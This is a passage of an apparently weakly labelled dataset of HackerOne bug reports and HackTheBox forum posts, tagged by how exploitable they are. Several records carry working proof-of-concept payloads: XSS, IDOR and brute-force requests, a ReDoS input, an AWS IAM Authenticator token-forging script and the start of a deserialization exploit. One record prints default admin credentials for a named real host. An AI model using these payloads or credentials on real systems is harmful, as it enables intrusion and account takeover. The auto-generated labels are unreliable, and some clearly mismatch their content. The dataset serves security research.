b\n-rw--w--w- 1 selmelc selmelc 0 Jun 27 08:41 flag\n-rwxr-x--- 1 selmelc selmelc 16608 Jun 27 07:04 rename\n\n```\nNormal curl behavior after the victim executed \"curl --cookie-ja", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-32001"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a0dc16d58e5395477e1f", "text": "[Improper Authorization] User with no Develop apps permission can Uninstall Custom App\n\nHi,\n\nYou know user must have Develop apps permission to Uninstall Develop apps \nto test this just create staff with `Manage and install apps and channels`\n\n{F1601504}\n\nsend this mutation just change appId by your id\n\n```\n{\"operationName\":\"UninstallCustomApp\",\"variables\":{\"appId\":\"gid://shopify/App/6431893\"},\"query\":\"mutation UninstallCustomApp($appId: ID!) {\\n appUninstall(input: {id: $appId}) {\\n app {\\n id\\n __typename\\n }\\n userErrors {\\n field\\n message\\n __typename\\n }\\n __typename\\n }\\n}\\n\"}\n```\n\n## Impact\n\nUser with no Develop apps permission can Uninstall Custom App", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4b7d06a59c778331e6d3", "text": "[Insecure Direct Object Reference (IDOR)] IDOR allows an attacker to delete anyone's featured photo.\n\nHi Team, previously I submitted a bug report #1606896 that closed as informative without understanding my proof-of-concept and I believe that the bug is 100% exploitable so here I am again explaining my proof-of-concept. I hope this time you people get my point.\nI found an IDOR while deleting featured images, allowing me to delete anyone's featured images all over Linkedin. The request takes two main parameters ==ImageId== and ==ProfileId==. Both of these parameters are almost impossible to guess or brute force, but when I'm looking at the victim's profile featured images I noticed that both of the ==required parameters are available in the link itself==.\n> Hence, there is no need to guess or enumerate the parameters and then I can delete anyone featured images.\n\n==Note: If you can't get any point then please let me know.==\n\nStep To Reproduce:\n-------------------\n1. Make two accounts one is for the victim and the other for an attacker.\n \n2. Add some featured images in both accounts. Go to\n Profile --> Add Profile Section --> Recommended --> Add Featured\n\n3. Delete an image on the attacker's account and capture that request using burp and sent it to the repeater.\n It makes a delete request like the one, given below.\n```\nDELETE /voyager/api/voyagerIdentityDashProfileTreasuryMedia/urn:li:fsd_profileTreasuryMedia:(█████████,███████)?sectionUrn=urn:li:fsd_profile:███████\n```\n\n4. It takes consists of thress things ==ProfileId== (██████████) , ==ImageId== (██████████) and ==sectionUrn== which also take same ProfileId value.\n \n\n5. Now visit the victim's profile featured images without logging in as the victim.\n Copy the link of the image you want to delete from the victim's profile, which looks like this.\n\n```\nhttps://www.linkedin.com/in/tension-███████/details/featured/██████/single-media-viewer?type=IMAGE&profileId=██████&lipi=urn:li:page:d_flagship3_profile_view_base_featured_details%3B███████\n```\n\n6. Paste that link into your notepad and notice that in this link, we got both ==ProfileId== , ==ImageId==.\nIn the above link, I get these. \nprofileId = █████\nImageId = ████\n\n7. Now simply replace the respected values of required parameters in the repeater and send a request.\n\n8. You see that the targeted featured image from the victim's profile was successfully deleted.\n\n##POC:\n\n████\n\n## Impact\n\nI am able to delete anyone's featured images on Linkedin.\n\nThanks,\nRegards\nAdilnBabras", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "87fd4dec27fb3e915e86", "text": "[Information Disclosure] Wordpress users disclosure from json and xml file\n\n## Summary:\nIt's possible to get information about the users registered (such as: username) without authentication in Wordpress via API on:\nhttps://www.mtn.co.sz/wp-json/oembed/1.0/embed?url=https://www.mtn.co.sz/&format=json\nhttps://www.mtn.co.sz/author-sitemap.xml\n\n## Steps To Reproduce:\nThe path https://www.mtn.co.sz/wp-json/wp/v2/users/me is configured correctly. Active usernames cannot be displayed and the application responds with code 401, saying that I am not authorized.\n\n{F1523939}\n\nBut there is this active path, which allows anyone to view active usernames:\nhttps://www.mtn.co.sz/wp-json/oembed/1.0/embed?url=https://www.mtn.co.sz/&format=json\nhttps://www.mtn.co.sz/author-sitemap.xml\n\n{F1523940}\n\n{F1523941}\n\nUsername found:\n- waseem\n- nkosivile\n\nThese users can be used to bruteforce, thanks also to the enabled xmlrpc.php file. Perform this request with Burp:\n```\nPOST /xmlrpc.php HTTP/1.1\nHost: www.mtn.co.sz\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nUpgrade-Insecure-Requests: 1\nTe: trailers\nContent-Length: 180\n\n wp.getUsersBlogs \\{\\{admin\\}\\} \\{\\{password\\}\\}\n```\nYou can replace the \"admin\" parameter with the username.\n\n{F1523945}\n\n## Impact\n\nIt's possible to get all the users registered on the system and create a bruteforce directed to these users.\n\n**Suggested Mitigation/Remediation Actions**\nAs already done for the \"/wp-json/wp/v2/users/\" path, I recommend blocking the active path as well.\nIf the XMLRPC.php file is not used, it should be disabled and removed completely to avoid potential risks by bruteforce. Otherwise, it should at least be blocked from outside access.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c2db076d535999f45ba8", "text": "For the first step you must use the information that you suppose, first use cupp to get a password list, remember the filters of this list that you learned in the previous lessons (sed …), after that, as the exercise recommend use the tool username-anarchy to create a list of usernames. With these tips you should pass the first parth of the exercise. Best, Amaro", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d9f317706809c9df2ba9", "text": "[Cross-site Scripting (XSS) - Stored] stored XSS on AliExpress Review Importer/Products when delete product\n\nHi @judgeme!\n`code`\nStep to reproduce:\n\n1. Go to Shopify admin and create product with name `\"><\"> img src=x onerror=prompt(document.domain)>`\n\n2. Go to AliExpress Review Importer/Products and delete our product with name ` \t\"><\"> img src=x onerror=prompt(document.domain)> `\n\n{F1544890}\n3. Xss work=)\n\n\nP.S. Poc wideo attach\n\n\n{F1544893}\n\n## Impact\n\ncookie stealer", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-31", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "63adf2051ad303f6707d", "text": "Did you keep in mind the different time zones? The displayed time zone is your local time zone in UTC, the server might have a different one. Thus, ±1 s is probably not enough", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-02-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3ab6d821d32b04fe2da0", "text": "[Improper Authentication - Generic] [nextcloud/server] Moment.js vulnerable to Inefficient Regular Expression Complexity\n\n## Describe the bugs: 🐛\nmoment is a lightweight JavaScript date library for parsing, validating, manipulating, and formatting dates. affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the preprocessRFC2822() function in from-string.js, when processing a very long crafted string (over 10k characters).\n\n**PoC:**\n```javascript\nmoment(\"(\".repeat(500000))\n```\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an:\n```javascript\nregex = /A(B|C+)+D/\n```\nThis regular expression accomplishes the following:\n * `A` The string must start with the letter 'A'\n * `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n * `D` Finally, we ensure this section of the string ends with a 'D'\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n```javscript\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")' 0.04s user 0.01s system 95% cpu 0.052 total\n```\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n\n\n**Workarounds**\nIn general, given the proliferation of ReDoS attacks, it makes sense to limit the length of the user input to something sane, like 200 characters or less. I haven't seen legitimate cases of date-time strings longer than that, so all moment users who do pass a user-originating string to constructor are encouraged to apply such a rudimentary filter, that would help with this but also most future ReDoS vulnerabilities.\n\n**Details/References**\nThe issue is rooted in the code that removes legacy comments (stuff inside parenthesis) from strings during rfc2822 parsing. `moment(\"(\".repeat(500000))` will take a few minutes to process, which is unacceptable. There is an excellent writeup of the issue here: [moment/moment#6015 (comment)](https://github.com/moment/moment/pull/6015#issuecomment-1152961973)\n\n## Impact\n\nCVE-2022-31129\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`\n[GHSA-wc69-rhjr-hc9g](https://github.com/moment/moment/security/advisories/GHSA-wc69-rhjr-hc9g)\n\n * using string-to-date parsing in moment (more specific", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-31129"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e50155eb4580cb12c28d", "text": "[Open Redirect] Open Redirection\n\n## Summary:\nHi jetblue Security Team.\n\nThe following URL is vulnerable to an open redirect (it will redirect to google.com):\n- https://█████_https@google.com\n\nWork at Google Chrome & Other Browser \nExcept Firefox will ask you first if you want to redirect to that page , See:-\n\n█████████\n \n##What is Open Redirect:-\nOpen redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL\n\nSupporting Material/References:\n-https://blog.detectify.com/2019/05/16/the-real-impact-of-an-open-redirect/\n-https://medium.com/@0xrishabh/open-redirect-to-account-takeover-e939006a9f24\n\n## Steps To Reproduce:\n1. Go to https://████_https@google.com\n2. Redirect to google.com\n\n## Impact\n\nOpen Redirection", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f2a5e59b646082ed6eed", "text": "[Insecure Direct Object Reference (IDOR)] Steal private objects of other projects via project import\n\n### Summary\nAn attacker could transfer issues, merge requests of another project to the imported project by importing a crafted GitLab export. \n\n### Steps to reproduce\n1. Import the attached tarball as GitLab export.\n2. Check the issues page of the imported project. You will see an private issue created by https://gitlab.com/nyangawa-h1 instead of the current user.\n\n### Description\nThe exploit is in project.json, I added one line to assign `issue_ids` and kept `issues` an empty array.\n```\n \"issue_ids\": [ 27422144 ], \n \"issues\": [], \n```\n\nThe issues_ids contains the database id of the issues the attacker wants to steal. There's no good way for the attacker to know the id of a specific issue, but as the id is incremental, the attacker could simply steal as many issues as possible in a brute forcing manner.\n\nThe root cause of this issue lies in `project_tree_restorer.rb`\n```\n...\n@project.assign_attributes(project_params)\n...\n```\n\nMany attributes (foreign key) like `issue_ids` and `merge_request_ids` are not excluded during import. According to my observation, affected objects including (but not limited to):\n```\nboard_ids\nissue_ids\nmerge_request_ids\nnote_ids\n...\n```\nLooks like almost all non-excluded attributes behaves like `issues` are affected.\n\n### Examples\n\n{F640860}\n\n### Output of checks\n\nThis bug happens on GitLab.com and self-hosted GitLab installations.\n\n## Impact\n\nWith this ability to modify relations between objects, an attacker could end up with accessing random resources of other users by traversing the incremental ID space.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d33d9dc61ee516e71e3e", "text": "[Improper Access Control - Generic] Missing rate limiting on password reset functionality allows to send lot of emails\n\nOn next cloud after signing up\nYou can reset your password here : https://support.nextcloud.com/#password_reset\nThe mail you will get will redirect you to a website named Wokli.\nAnd there you can also reset password using : https://ppp.woelkli.com/login\n\nHere you can bypass the rate limit using IP rotate extension of burp suite.\n\nSteps to reproduce:\n 1. Go to https://ppp.woelkli.com/login\n2. Enter your mail and click on reset password and intercept the request. The request will be something like this \n\nPOST /lostpassword/email HTTP/2\nHost: ppp.woelkli.com\nCookie: __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; oc_sessionPassphrase=YbNqNZBiBLj69oHQyf2o9Kcd9jlMXTrBm1Wv0xyF7aY4VI6t%2FTizoufLy8m0lU%2BHZ%2F0mCRK%2FC6VSZYjmztLv%2FQfYbjZxKVA0GtwP2q80D744o7CztCkWEtjQpvBK7jtX; ock6rp1oyjad=44hbnjo8uc6jjih95vtvie80kc\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json;charset=utf-8\nRequesttoken: elTOLCp7a4nWX2tjz/8iSI1fDGEd8Qfqi5GpX/RNPlM=:LX++HX0TDvGabxMXp4taJ9cUVSlvq2XTvaTlHrUOByk=\nContent-Length: 30\nOrigin: https://ppp.woelkli.com\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\n{\"user\":\"yougovxxx@gmail.com\"}\n\n3. Now send the request to repeater and try to resend it . After 7 to 8 tries it will give a rate limit and a response code of 429.\n4. To bypass it login to your IP rotate and send the above request to intruder and and turn ON IP rotate and set the intruder to null payloads.\n5. You will get lots of emails of reset password.\n\n\nSolution: \nI Will Recommend You To Add A ReCaptcha & Sort Of Something Which Requires Manual Human Interaction To Proceed Like You Can Add Captcha Like 2+2=___ so that it cannot be brute forced and you also can have a limit at the backend for particular number upto 5 times a day user can request Forget Password Email or Link something like that will prevent you from someone exploiting this vulnerability\n\n## Impact\n\nIf You Are Using Any Email Service Software API Or Some Tool Which Costs You For Your Email This Type Of Attack Can Result You In Financial Lose And It Can Also Slow Down Your Services It Can Take Bulk Of Storage In Sent Mail Although If Users Are Affected By This Vulnerability They Can Stop Using Your Services Which Can Lead To Business Risk", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b1b067f2a9f357fa5c1a", "text": "[Information Disclosure] insecure gitlab repositories at ████████ [HtUS]\n\n**If you click the link https://███, you're redirected to https://██████/users/sign_in, where credentials have to be inserted. \nThe repositories are private and shouldn't be accessable for unauthenticated users!**\n\n### POC\n\n* If you click the following links https://████/api/v4/projects, information about internal projects and users is leaked\n\n* I just take projectid: 4667 as an example for the information disclosure\n```\n{\"id\":4667,\"description\":\"This Network-graph based literature review tool uses the open-source version of Neo4j (https://neo4j.com/) with Jupyter Notebooks written in Python to import academic literature metadata from a variety of sources. \\r\\n\",\"name\":\"Graph-Based Literature Review Tool\",\"name_with_namespace\":\"Senft, Michael / Graph-Based Literature Review Tool\",\"path\":\"graph-based-literature-review-tool\",\"path_with_namespace\":\"██████████/graph-based-literature-review-tool\",\"created_at\":\"2021-10-19T12:47:16.550-07:00\",\"default_branch\":\"master\",\"tag_list\":[],\"topics\":[],\"ssh_url_to_repo\":\"git@██████:████/graph-based-literature-review-tool.git\",\"http_url_to_repo\":\"https://████████/███████/graph-based-literature-review-tool.git\",\"web_url\":\"https://████████/████████/graph-based-literature-review-tool\",\"readme_url\":\"https://███/███/graph-based-literature-review-tool/-/blob/master/README.md\",\"avatar_url\":\"https://████/uploads/-/system/project/avatar/4667/SchemaModel.jpg\",\"forks_count\":0,\"star_count\":1,\"last_activity_at\":\"2022-01-31T08:48:54.473-08:00\",\"namespace\":{\"id\":1306,\"name\":\"Senft, Michael\",\"path\":\"██████████\",\"kind\":\"user\",\"full_path\":\"██████\",\"parent_id\":null,\"avatar_url\":\"/uploads/-/system/user/avatar/1117/avatar.png\",\"web_url\":\"https://███/████████\"}}\n```\n\n* The source-code is accessable/readable: \nhttps://██████████/████/graph-based-literature-review-tool\nhttps://█████/███████/graph-based-literature-review-tool/-/blob/master/README.md \n\n* It can be cloned \n```\ngit clone https://███/██████████/graph-based-literature-review-tool.git\nCloning into 'graph-based-literature-review-tool'...\nremote: Enumerating objects: 198, done.\nremote: Counting objects: 100% (68/68), done.\nremote: Compressing objects: 100% (31/31), done.\nremote: Total 198 (delta 41), reused 64 (delta 37), pack-reused 130\nReceiving objects: 100% (198/198), 239.72 KiB | 503.00 KiB/s, done.\nResolving deltas: 100% (109/109), done.\n```\n\n## Impact\n\nA potential attacker has full access to user information and to the users source-code", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "61aa7e3df68904f2f8ba", "text": "[Improper Authentication - Generic] Bypass validation parts in AWS IAM Authenticator for Kubernetes\n\n## Summary:\nWhenever the aws-iam-authenticator server gets a POST request to /authenticate it extracts the token and validates it. The token's content is a signed AWS STS request to the GetCallerIdentity endpoint, where the response content is used to map to matching K8s identity (username, groups).\n\nI found several bypasses to validation parts in [AWS IAM Authenticator](https://github.com/kubernetes-sigs/aws-iam-authenticator):\n1. It is possible to craft a token **without signed cluster ID header** and use it for replay attacks.\n2. It is possible to manipulate the extracted **AccessKeyID**. Since the AccessKeyID value [can be used as part of the identity](https://github.com/kubernetes-sigs/aws-iam-authenticator#:~:text=%23%20If%20unalterable%20identification%20of%20an%20IAM%20User%20is%20desirable%2C%20you%20can%20map%20against%0A%20%20%23%20AccessKeyID.), it allows an attacker to gain hight permissions in the cluster.\n3. It is possible to send a request to other action values (not only GetCallerIdentity). Since I couldn't find a way to control the host or add other parameters to the request, the impact of changing the action is low.\n\n## Kubernetes Version:\nall versions\n\n## Component Version:\nall versions. the issue seems to be there from [first commit](https://github.com/kubernetes-sigs/aws-iam-authenticator/commit/aeac2587d437da3751f3be8eb9a79a8311d33dd1#diff-b03d5162238d36a569ac0c110484bf356f617e22967aeb1af853b02993da60b8R141).\n\n## Steps To Reproduce:\n1. Create a K8s cluster with [AWS IAM Authenticator](https://github.com/kubernetes-sigs/aws-iam-authenticator) as auth webhook.\n(I run the aws-iam-authenticator server locally on my machine using the command `aws-iam-authenticator server -c config.yaml`)\n2. You can use the python script below to generate all types of malicious tokens. change the CLUSTER_ID value before running.\n\n```python\nimport base64\nimport boto3\nimport re\nfrom botocore.signers import RequestSigner\n\nREGION = 'us-east-1'\nCLUSTER_ID = 'gaf-cluster'\n\n\ndef get_bearer_token(url, headers):\n STS_TOKEN_EXPIRES_IN = 60\n session = boto3.session.Session()\n\n client = session.client('sts', region_name=REGION)\n service_id = client.meta.service_model.service_id\n\n signer = RequestSigner(\n service_id,\n REGION,\n 'sts',\n 'v4',\n session.get_credentials(),\n session.events\n )\n\n params = {\n 'method': 'GET',\n 'url': url,\n 'body': {},\n 'headers': headers,\n 'context': {}\n }\n\n signed_url = signer.generate_presigned_url(\n params,\n region_name=REGION,\n expires_in=STS_TOKEN_EXPIRES_IN,\n operation_name=''\n )\n\n return signed_url\n\n\ndef base64_encode_no_padding(signed_url):\n base64_url = base64.urlsafe_b64encode(signed_url.encode('utf-8')).decode('utf-8')\n\n # remove any base64 encoding padding:\n return 'k8s-aws-v1.' + re.sub(r'=*', '', base64_url)\n\n\ndef create_mal_token_with_other_action(action_name):\n url = f'https://sts.{REGION}.amazonaws.com/?Action={action_name}&Version=2011-06-15&action=GetCallerIdentity'\n headers = {'x-k8s-aws-id': CLUSTER_ID}\n signed_url = get_bearer_token(url, headers)\n\n signed_url = signed_url.replace(f'&action=GetCallerIdentity', '')\n signed_url += f'&action=GetCallerIdentity'\n\n return base64_encode_no_padding(signed_url)\n\n\ndef create_mal_token_without_cluster_id_header_signed():\n url = f'https://sts.{REGION}.amazonaws.com/?Action=GetCallerIdentity&Version=2011-06-15&x-amz-signedheaders=x-k8s-aws-id'\n headers = {}\n signed_url = get_bearer_token(url, headers)\n\n signed_url = signed_url.replace('&x-amz-signedheaders=x-k8s-aws-id', '')\n signed_url += '&x-amz-signedheaders=x-k8s-aws-id'\n\n return base64_encode_no_padding(signed_url)\n\n\ndef create_mal_token_with_other_access_key(value):\n url = f'https://sts.{REGION}.amazonaws.com/?Action=GetCallerIdentity&Version=2011-06-15&x-amz-credential={value}'\n headers = {'x-k8s-aws-id': CLUS", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "aada01c08cc5f87f309f", "text": "hi there. the user to access the tomcat manager, is it tomcat or a different user? I am digging on log files and conf files accessible by user barry/group adm, but no luck", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8c78fddac96cce72e5a3", "text": "[Uncontrolled Resource Consumption] DoS in bigdecimal's sqrt function due to miscalculation of loop iterations\n\n# Vulnerability\n__Affected Product__: `bigdecimal` extension in https://github.com/ruby/ruby\n__Affected Versions__: At least version 3.2.2, I didn't test any previous versions\n\nThe current implementation of `BigDecimal#sqrt` in `ext/bigdecimal/bigdecimal.c` erroneously checks its parameter\nand allows users of the function to control how long it will run. This may lead to\na DoS if the parameter to the function can be controlled by an attacker.\n\nThe implementation of `BigDecimal#sqrt` involves a loop that iteratively calculates\nthe value of the square root:\n```c\ndo {\n y->MaxPrec *= 2;\n if (y->MaxPrec > y_prec) y->MaxPrec = y_prec;\n f->MaxPrec = y->MaxPrec;\n VpDivd(f, r, x, y); /* f = x/y */\n VpAddSub(r, f, y, -1); /* r = f - y */\n VpMult(f, VpConstPt5, r); /* f = 0.5*r */\n if (VpIsZero(f))\n goto converge;\n VpAddSub(r, f, y, 1); /* r = y + f */\n VpAsgn(y, r, 1); /* y = r */\n} while (++nr < n);\n```\nThe number of iterations is determined by the number `n`, which is derived from the\nparameter of the `sqrt` function.\nThe application tries to impose a limit on the number of iterations, as can be seen\nin line 4659:\n```c\n#define maxnr 100UL /* Maximum iterations for calculating sqrt. */\n```\nHowever, the calculation of `n` is erroneous and uses `maxnr` as a _lower_ bound and not\nan upper bound for `n` as can be seen in line 7220:\n```c\nif (n < (SIGNED_VALUE)maxnr) n = (SIGNED_VALUE)maxnr;\n```\nThis may cause the program to have more iterations than originally intended.\n\n# Proof of Concept\nThe following ruby program iterates 10000 times instead of 100 and takes longer than 10 min to complete on my machine:\n```rb\nrequire 'bigdecimal'\nBigDecimal(\"6E19\").sqrt(10000)\n```\nFurthermore, it can be observed the ruby interpreter stalls completely. The program has to be killed with SIGKILL.\n\n# Solution\nThe following patch resolves the error:\n```diff\ndiff --git a/ext/bigdecimal/bigdecimal.c b/ext/bigdecimal/bigdecimal.c\nindex 07c2bcf0b5..31e5574574 100644\n--- a/ext/bigdecimal/bigdecimal.c\n+++ b/ext/bigdecimal/bigdecimal.c\n@@ -7217,7 +7217,7 @@ VpSqrt(Real *y, Real *x)\n y->MaxPrec = Min((size_t)n , y_prec);\n f->MaxPrec = y->MaxPrec + 1;\n n = (SIGNED_VALUE)(y_prec * BASE_FIG);\n- if (n < (SIGNED_VALUE)maxnr) n = (SIGNED_VALUE)maxnr;\n+ if (n > (SIGNED_VALUE)maxnr) n = (SIGNED_VALUE)maxnr;\n\n /*\n * Perform: y_{n+1} = (y_n - x/y_n) / 2\n```\nThis change maintains the correctness of the implementation. \nI have checked this against the test suite from https://github.com/ruby/bigdecimal and all the tests still pass.\n\n## Impact\n\nIf an attacker can control the parameter to `BigDecimal#sqrt` he/she can cause a ruby program to hang\nfor a long time.\nFurtermore, since the loop is inside of a function of an extension it blocks the interpreter / execution engine\nas a whole hindering the delivery of events or signals.\nAs seen above, a ruby program that is caught up in such a loop can only be interrupted by a SIGKILL signal.\nSince the bug is\n1. Easy to trigger if the necessary conditions are met\n2. Has a huge effect for relatively small input values\n\nI chose the severity medium.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-12-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "58761e3371de6602677a", "text": "ss -l -4 | tr “.” \" \" | column -t | grep LISTEN | grep -v “127” | wc -l worked for me all fine tr - replaces the dots with spaces column separates everything into columns grep then we filter LISTEN grep -v filters out 127 wc gives you your answerr", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-05-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ccddd70acf979640ce8c", "text": "can you help me in the digging in part and going depper part", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-02-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bbc1f2f72db9be820c6a", "text": "[Unknown] Default Admin Username and Password on remedysso.mtncameroon.net\n\n## Summary:\nA Remedy Single Sign-On (Remedy SSO) Server is running at https://remedysso.mtncameroon.net/rsso/admin/#/. \nIt is possible to access the application is using the default Administrator credentials.\n\n## Steps To Reproduce:\nGo to https://remedysso.mtncameroon.net/rsso/admin/#/ and login with credentials:\n- Username: Admin\n- Password: RSSO#Admin#\n\n## Remediation\nChange the password of the Admin user or disable the account.\n\n## References\nhttps://cwe.mitre.org/data/definitions/521.html\n\n## Impact\n\nA MNT Group Single Sign-On application was misconfigured in a manner that may have allowed a malicious user to login with the administrator user. The user is capable to perform any kind of configuration of the SSO system and retrieve sensitive information about organization users and infrastructure.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "74b176a166a39eed9b76", "text": "[Unknown] CVE-2017-5929: Hyperledger - Arbitrary Deserialization of Untrusted Data\n\n## Vulnerability Overview\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.\n\nDeserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution. Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed. Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n**System Host(s):**\nhttps://github.com/hyperledger/fabric-chaincode-java/blob/-/fabric-chaincode-integration-test/src/contracts/wrapper-maven/pom.xml\nQOS.ch Logback before 1.2.0 has a serialization vulnerability affecting the SocketServer and ServerSocketReceiver components. The RemoteStreamAppenderClient class in logback-classic and the SocketNode classes in logback-classic and logback-access allow data to be deserialized over a Java Socket, via an ObjectInputStream, without validating the data beforehand. When data is received from the Socket, to be logged, it is deserialized into Java objects.An attacker can exploit this vulnerability by sending malicious, serialized Java objects over the connection to the Socket, which may result in execution of arbitrary code when those objects are deserialized. Note that although logback-core is implicated by the Logback project here, the Sonatype Security Research team discovered that the vulnerability is actually present in the logback-classic and logback-access components. Versions prior to 1.2.0 are vulnerable, as stated in the advisory.\n\n**Exploitation code:**\n```python\nimport socket\nimport sys\n\nhost = sys.argv[1]\nport = sys.argv[2]\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nprint \"Connecting to: \" + host + \":\" + port\nsock.connect((host, int(port)))\nprint \"Connected.\"\n\npayload = 